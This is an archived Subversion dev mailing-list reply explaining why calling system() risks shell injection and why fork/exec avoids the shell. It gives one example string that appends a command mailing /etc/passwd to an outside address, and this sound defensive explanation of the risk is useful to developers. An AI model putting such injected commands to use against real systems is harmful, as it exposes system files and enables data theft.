[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

Re: CVS update: subversion STACK

From: Greg Stein <gstein_at_lyra.org>
Date: 2000-11-08 10:44:32 CET

On Tue, Nov 07, 2000 at 03:29:29PM -0600, Karl Fogel wrote:
>...
> Is system() a security risk beyond this, and if so how should we drive
> external programs?

Yah, system() is actually passed to /bin/sh (or whatever). If you aren't
careful, you could end up with something like:

    system("diff whatever ; mail gstein@lyra.org < /etc/passwd")

Not good :-)

Doing a fork/exec of the actual target program will avoid the shell.
However, it also makes redirection a bit more painful (which I saw you
used). Since system() calls a shell, it is doing redirection. If you
fork/exec, then you must fork, revamp the stdin/out/err descriptors, then
exec. Great fun :-)

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/
Received on Sat Oct 21 14:36:14 2006

This is an archived mail posted to the Subversion Dev mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.